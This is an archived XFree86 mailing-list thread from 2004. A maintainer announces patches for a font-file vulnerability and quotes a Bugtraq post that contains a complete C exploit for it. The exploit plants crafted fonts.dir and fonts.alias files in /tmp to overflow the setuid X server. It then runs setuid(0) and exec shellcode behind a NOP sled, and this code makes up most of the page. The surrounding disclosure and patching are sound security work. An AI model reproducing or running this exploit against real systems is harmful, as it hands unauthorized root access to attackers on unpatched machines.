Re: Fwd: XFree86 vulnerability exploit

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Patches for this and related vulnerabilities have been committed
to all of the release branches of the XFree86 CVS repository, and
to the trunk.  A source patch relative to 4.3.0.1 can be found at
<ftp://ftp.xfree86.org/pub/XFree86/4.3.0/fixes/fontfile.diff>.

Once things have settled, I'm planning to add snapshot tags to each
branch. This will give a set of definite version numbers where this
is fixed.

David
-- 
http://www.XFree86.org/~dawes

On Thu, Feb 12, 2004 at 04:50:51PM -0500, Scott Gifford wrote:
>This was posted on Bugtraq earlier today, and I thought it might be of
>interest here.
>
>
>From: Bender <bender2@xxxxxxxxxxxxxxxx>
>Subject: XFree86 vulnerability exploit
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Date: Wed, 11 Feb 2004 11:09:00 +0000
>
>Hello
>
>Below you can find a exploit for latest bug in XFree86 sofware.
>Tested on some versions of RedHat Linux (mainly 7.0).
>
>regards
>Bender
>
>/* For educational purposes only                            */
>/* Brought to you by bender2@xxxxxxxxxxxx   11.10.2004      */
>
>#include <fcntl.h>
>
>#define NOPNUM 8000
>#define ADRNUM 1058
>
>/* shellcode from LSD */
>char setuidcode[]=         /* 8 bytes                        */
>    "\x33\xc0"             /* xorl    %eax,%eax              */
>    "\x31\xdb"             /* xorl    %ebx,%ebx              */
>    "\xb0\x17"             /* movb    $0x17,%al              */
>    "\xcd\x80"             /* int     $0x80                  */
>;
>
>char shellcode[]=          /* 24 bytes                       */
>    "\x31\xc0"             /* xorl    %eax,%eax              */
>    "\x50"                 /* pushl   %eax                   */
>    "\x68""//id"           /* pushl   $0x68732f2f            */
>    "\x68""/tmp"           /* pushl   $0x6e69622f            */
>    "\x89\xe3"             /* movl    %esp,%ebx              */
>    "\x50"                 /* pushl   %eax                   */
>    "\x53"                 /* pushl   %ebx                   */
>    "\x89\xe1"             /* movl    %esp,%ecx              */
>    "\x99"                 /* cdql                           */
>    "\xb0\x0b"             /* movb    $0x0b,%al              */
>    "\xcd\x80"             /* int     $0x80                  */
>;
>
>char jump[]=
>    "\x8b\xc4"                /* movl   %esp,%eax           */
>    "\xc3"                    /* ret                        */
>;
>
>
>main(int argc,char **argv){
>    char buffer[20000],adr[4],pch[4],*b,*envp[4];
>    int i,fd;
>
>
>    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000;
>
>    envp[0]=&buffer[2000];
>    envp[1]=0;
>
>    printf("adr: 0x%x\n",adr+12000);
>
>    b=buffer;
>    strcpy(buffer,"1\n");
>    strcat(buffer,"aaaa.pcf -aaaa-fixed-small-a-semicondensed--1-1-1-1-a-1-iso1111-1\n");
>    fd=open("/tmp/fonts.dir",O_CREAT|O_WRONLY,0666);
>    write(fd,buffer,strlen(buffer));
>
>    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
>    *b++='\n';
>
>    fd=open("/tmp/fonts.alias",O_CREAT|O_WRONLY,0666);
>    write(fd,buffer,strlen(buffer));
>    close(fd);
>
>    b=&buffer[2000];
>    
>for(i=0;i<NOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++) 
>*b++=0x90;
>    for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
>    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
>    *b=0;
>
>    execle("/usr/bin/X11/X","X",":0","-fp","/tmp",0,envp);
>}
>
> -- 
>bender2@xxxxxxxxxxxxxxxx
>SDF Public Access UNIX System - http://sdf.lonestar.org
>_______________________________________________
>XFree86 mailing list
>XFree86@xxxxxxxxxxx
>http://XFree86.Org/mailman/listinfo/xfree86
>
_______________________________________________
XFree86 mailing list
XFree86@xxxxxxxxxxx
http://XFree86.Org/mailman/listinfo/xfree86

[Index of Archives]     [X Forum]     [Xorg]     [XFree86 Newbie]     [IETF Announce]     [Security]     [Font Config]     [Bugtraq]     [Yosemite]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Linux Kernel]

  Powered by Linux